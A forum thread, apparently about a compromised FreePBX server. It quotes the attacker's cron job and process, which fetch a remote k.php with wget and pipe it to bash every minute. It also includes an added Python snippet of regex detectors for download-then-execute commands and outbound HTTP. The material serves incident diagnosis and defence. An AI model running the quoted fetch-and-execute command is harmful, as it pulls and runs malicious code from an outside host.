I am doing some work relating to a new gateway router and perimeter firewall. While checking https connectivity from outside I happened to discover this using netstat:
# netstat -an | grep 80
tcp 0 0 192.168.6.9:41780 0.0.0.0:* LISTEN
tcp 0 1 192.168.6.9:42528 22.214.171.124:80 SYN_SENT
tcp 0 1 192.168.6.9:42522 126.96.36.199:80 SYN_SENT
tcp 0 1 192.168.6.9:42526 188.8.131.52:80 SYN_SENT
. . .
My question: What is FreePBX doing connecting to that address?
That is malicious traffic specific to FreePBX – your machine has already been compromised.
Had your firewall not blocked it, the script would have retrieved more malicious code.
So I see this:
root 24718 1 0 12:18 ? 00:00:00 /bin/sh -c wget http://184.108.40.206/k.php -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2
Which is likely the compromise script running. How do I tell where it is running from?
That is interesting. I see this in cron:
*/1 * * * * wget http://220.127.116.11/k.php -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2
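A small check for the three indicators this thread turned up (outbound port-80 SYN_SENT from the PBX, a wget-then-bash process, a cron job that re-fetches the script every minute), as an added example that is not from the thread or from FreePBX; the sample netstat, ps and crontab lines are constructed from the output quoted above.

```python
import re

# Constructed sample lines modelled on the netstat, ps and crontab output in the thread.
NETSTAT = """tcp 0 0 192.168.6.9:41780 0.0.0.0:* LISTEN
tcp 0 1 192.168.6.9:42528 22.214.171.124:80 SYN_SENT
tcp 0 0 192.168.6.9:5060 0.0.0.0:* LISTEN""".splitlines()
PS = """root 24718 1 0 12:18 ? 00:00:00 /bin/sh -c wget http://184.108.40.206/k.php -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2
asterisk 1200 1 0 12:00 ? 00:00:03 /usr/sbin/asterisk -U asterisk -G asterisk""".splitlines()
CRON = """*/1 * * * * wget http://220.127.116.11/k.php -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2
0 3 * * * /usr/sbin/fwconsole backup""".splitlines()

# A downloader writing a file that the same command line then hands to a shell.
DOWNLOAD_THEN_EXEC = re.compile(
    r"\b(?:wget|curl)\b[^;]*?https?://([^/\s]+)\S*[^;]*?-[Oo]\s*([^\s;]+)[^;]*;\s*(?:ba)?sh\s+\2")
# An outbound HTTP connection (attempted or established) from the local host.
OUTBOUND_HTTP = re.compile(
    r"^tcp\s+\d+\s+\d+\s+\S+:\d+\s+(\d+(?:\.\d+){3}):80\s+(?:SYN_SENT|ESTABLISHED)")

def outbound_http_peers(netstat_lines):
    """Remote IPs the PBX is trying to reach on port 80; a PBX normally has none."""
    return [m.group(1) for line in netstat_lines if (m := OUTBOUND_HTTP.match(line))]

def download_exec_commands(lines):
    """(host, dropped_path) for every ps or cron line that fetches a script and runs it."""
    return [(m.group(1), m.group(2)) for line in lines if (m := DOWNLOAD_THEN_EXEC.search(line))]

def suspicious_cron_entries(cron_lines):
    """Cron jobs that run every minute and fetch-and-execute: the persistence seen in the thread."""
    return [line for line in cron_lines
            if line.startswith("*/1 ") and DOWNLOAD_THEN_EXEC.search(line)]

def report():
    """Collect all indicators; any non-empty list means rebuild the host rather than clean it."""
    return {
        "outbound_http": outbound_http_peers(NETSTAT),
        "download_exec": download_exec_commands(PS + CRON),
        "cron_persistence": suspicious_cron_entries(CRON),
    }

if __name__ == "__main__":
    for key, value in report().items():
        print(f"{key}: {value}")
```

On a live box the same functions can be fed the real output of `netstat -an`, `ps -ef` and `crontab -l` for each user instead of the constructed lines.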
Your system is compromised, as @Stewart1 already said. Your best bet is to wipe and start over. You can attempt to clean up, but you are assuming that you are smarter/more determined than the bad guys.
This thread may be useful:
but I strongly agree with @adell4444 – start over.
Which of these are used by FreePBX?
Yes, I see the need to get this fixed with a scrub. But not in the middle of a workday.
sugarmaint, supports and supermaint are all known to have been maliciously added. Take a read through the thread that was attached.